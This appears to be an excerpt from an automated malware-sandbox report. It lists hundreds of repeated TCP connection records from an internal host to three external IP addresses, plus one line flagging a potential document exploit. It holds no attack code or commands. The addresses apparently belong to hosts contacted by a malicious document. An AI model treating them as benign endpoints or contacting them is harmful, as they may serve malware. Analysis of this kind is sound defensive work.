Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
